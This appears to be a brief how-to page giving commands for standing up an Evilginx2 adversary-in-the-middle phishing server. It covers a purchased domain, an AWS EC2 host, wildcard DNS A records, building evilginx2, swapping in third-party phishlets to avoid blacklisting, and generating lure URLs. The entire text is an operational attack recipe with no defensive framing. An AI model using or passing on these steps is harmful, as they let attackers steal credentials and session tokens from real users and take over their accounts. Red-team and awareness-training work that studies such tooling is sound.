Skip to content

Phishing with Evilginx

Infrastructure Setup:

  • Purchase a domain for phishing
  • Create an AWS EC2 Server
  • Open ports: 22, 443

Setup DNS

Set A record on phishing domain to point at the AWS EC2 server.

Namecheap example

Point the domain root at the ec2 ip address
Type: A Record
Host: @
Value: <ec2_ipv4>
Use the * to point all subdomains of the domain at the ec2 ip address
Type: A Record
Host: *
Value: <ec2_ipv4>

Evilginx2 setup

Build and start evilginx2
sudo dnf update -y
sudo dnf install -y golang git firewalld
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
make
rm -f phishlets/* # Delete example/builtin phishlets - they will get your domain blacklisted.
cd phishlets
git clone https://github.com/An0nUD4Y/Evilginx2-Phishlets
cd ..
sudo build/evilginx -p ./phishlets
Configure a phishing page
config domain <phishing_domain>
config ipv4 external <ec2_server_ipv4>
phishlets hostname <phishlet_name> <phishing_domain>
phishlets enable <phishlet_name>
Create phishing lure
lures create <phishlet_name>
Generate phishing URL
lures get-url <lure_id>

Use the command lures to see all available lures and their ID's